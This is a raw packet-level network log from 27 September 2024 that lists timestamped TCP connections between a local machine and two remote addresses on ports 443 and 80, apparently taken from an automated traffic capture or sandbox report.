                                                                                                                                                                Sep 27, 2024 17:42:30.262443066 CEST44349792172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.262790918 CEST44349792172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.263623953 CEST49792443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.311424971 CEST44349792172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.460691929 CEST8049791185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.460761070 CEST4979180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:30.569399118 CEST4979180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:30.569742918 CEST4979480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:30.579770088 CEST8049794185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.579910994 CEST4979480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:30.580265045 CEST4979480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:30.581228971 CEST8049791185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.581295967 CEST4979180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:30.591861963 CEST8049794185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.663578033 CEST44349793172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.663672924 CEST44349793172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.663892031 CEST49793443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.663983107 CEST49793443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.664015055 CEST44349793172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.664052963 CEST49793443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.664060116 CEST44349793172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.704705000 CEST44349792172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.705440044 CEST44349792172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.707180023 CEST49792443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.707264900 CEST49792443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.707319021 CEST44349792172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.707355976 CEST49792443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.707375050 CEST44349792172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.977154970 CEST49795443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.977238894 CEST44349795172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.977328062 CEST49795443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.977662086 CEST49795443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.977694988 CEST44349795172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.992408991 CEST49796443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.992455006 CEST44349796172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.992597103 CEST49796443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.992983103 CEST49796443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.993001938 CEST44349796172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:31.323282957 CEST8049794185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:31.323369980 CEST4979480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:31.325284958 CEST4979480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:31.550769091 CEST4979480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:31.624974012 CEST8049794185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:31.625026941 CEST8049794185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:31.625081062 CEST4979480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:31.625641108 CEST8049794185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:31.626753092 CEST44349795172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:31.626831055 CEST49795443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:31.627707005 CEST44349796172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:31.627775908 CEST49796443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:31.630497932 CEST49796443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:31.630508900 CEST44349796172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:31.630759001 CEST44349796172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:31.631563902 CEST49796443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:31.675410986 CEST44349796172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:31.844080925 CEST8049794185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:31.844163895 CEST4979480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:31.887314081 CEST49795443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:31.887343884 CEST44349795172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:31.887705088 CEST44349795172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:31.889857054 CEST49795443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:31.931446075 CEST44349795172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:31.961441040 CEST4979480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:31.961750031 CEST4979780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:31.966963053 CEST8049794185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:31.967027903 CEST4979480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:31.967281103 CEST8049797185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:31.967344999 CEST4979780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:31.967492104 CEST4979780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:31.972865105 CEST8049797185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:32.072149992 CEST44349796172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:32.072257996 CEST44349796172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:32.072316885 CEST49796443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:32.072465897 CEST49796443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:32.072480917 CEST44349796172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:32.072498083 CEST49796443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:32.072501898 CEST44349796172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:32.123493910 CEST44349795172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:32.123601913 CEST44349795172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:32.123672009 CEST49795443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:32.125798941 CEST49795443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:32.125843048 CEST44349795172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:32.125870943 CEST49795443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:32.125888109 CEST44349795172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:32.232104063 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:32.232207060 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:32.232289076 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:32.241986036 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:32.242001057 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:32.477060080 CEST49801443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:32.477112055 CEST44349801172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:32.477201939 CEST49801443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:32.477602959 CEST49801443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:32.477617025 CEST44349801172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:32.714004993 CEST8049797185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:32.714092970 CEST4979780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:32.715043068 CEST4979780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:32.725683928 CEST8049797185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:32.788676023 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:32.788820982 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:32.790240049 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:32.790277004 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:32.790543079 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:32.805290937 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:32.847405910 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:32.979856968 CEST8049797185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:32.980088949 CEST4979780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:33.019778013 CEST44349801172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.019876003 CEST49801443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.021802902 CEST49801443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.021811962 CEST44349801172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.022054911 CEST44349801172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.023008108 CEST49801443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.067392111 CEST44349801172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.085432053 CEST4979780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:33.085844994 CEST4980280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:33.122191906 CEST8049802185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.122340918 CEST4980280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:33.122531891 CEST4980280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:33.123147011 CEST8049797185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.123246908 CEST4979780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:33.378901005 CEST4980280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:33.505916119 CEST8049797185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.506084919 CEST4979780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:33.506371021 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.506438971 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.506477118 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.506525993 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.506522894 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.506550074 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.506566048 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.506597996 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.506623983 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.506629944 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.506635904 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.506665945 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.506669998 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.509749889 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.509795904 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.509809017 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.509824038 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.509975910 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.513679028 CEST8049802185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.513689995 CEST8049802185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.513940096 CEST44349801172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.514035940 CEST44349801172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.514174938 CEST49801443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.514288902 CEST49801443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.514308929 CEST44349801172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.514347076 CEST49801443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.514353037 CEST44349801172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.520821095 CEST8049797185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.520953894 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.523610115 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.523644924 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.523677111 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.523706913 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.523716927 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.523737907 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.523751974 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.524207115 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.524256945 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.524269104 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.526483059 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.526515961 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.526532888 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.526552916 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.526566029 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.527453899 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.528004885 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.528052092 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.528079987 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.528090954 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.528110027 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.537770987 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.537802935 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.537822008 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.537846088 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.538023949 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.538846016 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.539720058 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.539753914 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.539781094 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.539798021 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.539948940 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.540678978 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.540751934 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.540808916 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.559914112 CEST49800443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.559967995 CEST44349800172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.894162893 CEST49803443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.894263983 CEST44349803172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.894366980 CEST49803443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.894928932 CEST49803443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.894963980 CEST44349803172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.914546967 CEST49804443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.914583921 CEST44349804172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.914664030 CEST49804443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.914988995 CEST49804443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:33.914999962 CEST44349804172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.943217039 CEST8049802185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:33.943321943 CEST4980280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:33.944351912 CEST4980280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:33.955063105 CEST8049802185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.340359926 CEST8049802185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.340430021 CEST4980280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:34.392498016 CEST44349803172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.392632008 CEST49803443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.420996904 CEST44349804172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.421117067 CEST49804443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.497891903 CEST49804443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.497920990 CEST44349804172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.498270988 CEST44349804172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.499072075 CEST49804443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.503202915 CEST4980280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:34.505944967 CEST4980580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:34.511040926 CEST8049802185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.511090040 CEST4980280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:34.512008905 CEST49803443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.512048960 CEST44349803172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.512378931 CEST44349803172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.513068914 CEST8049805185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.513144970 CEST4980580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:34.543443918 CEST44349804172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.548861027 CEST4980580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:34.554471016 CEST8049805185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.566387892 CEST49803443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.606240988 CEST49803443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.651412010 CEST44349803172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.824911118 CEST44349803172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.825021029 CEST44349803172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.825119019 CEST49803443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.825496912 CEST49803443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.825544119 CEST44349803172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.825577974 CEST49803443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.825597048 CEST44349803172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.919162989 CEST44349804172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.919266939 CEST44349804172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.919336081 CEST49804443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.919753075 CEST49804443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.919771910 CEST44349804172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.919822931 CEST49804443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.919830084 CEST44349804172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.274259090 CEST8049805185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.274319887 CEST4980580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:35.275623083 CEST4980580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:35.280626059 CEST8049805185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.431230068 CEST49806443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:35.431278944 CEST44349806172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.431730032 CEST49806443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:35.431730032 CEST49806443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:35.431766033 CEST44349806172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.504559994 CEST8049805185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.504622936 CEST4980580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:35.554371119 CEST49807443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:35.554485083 CEST44349807172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.554589987 CEST49807443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:35.554919004 CEST49807443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:35.554955959 CEST44349807172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.614154100 CEST4980580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:35.614569902 CEST4980880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:35.619846106 CEST8049805185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.619920969 CEST4980580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:35.620018959 CEST8049808185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.620134115 CEST4980880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:35.620328903 CEST4980880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:35.625247002 CEST8049808185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.898221016 CEST44349806172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.898291111 CEST49806443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:35.903183937 CEST49806443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:35.903203964 CEST44349806172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.903525114 CEST44349806172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.904361010 CEST49806443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:35.947412968 CEST44349806172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.023262024 CEST44349807172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.023349047 CEST49807443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.037611961 CEST49807443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.037638903 CEST44349807172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.037971973 CEST44349807172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.047745943 CEST49807443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.091427088 CEST44349807172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.313155890 CEST44349806172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.313277960 CEST44349806172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.313333988 CEST49806443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.320096970 CEST49806443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.320118904 CEST44349806172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.320144892 CEST49806443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.320149899 CEST44349806172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.327580929 CEST8049808185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.327677965 CEST4980880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:36.345884085 CEST4980880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:36.350657940 CEST8049808185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.448318005 CEST44349807172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.448457003 CEST44349807172.67.187.100192.168.2.4
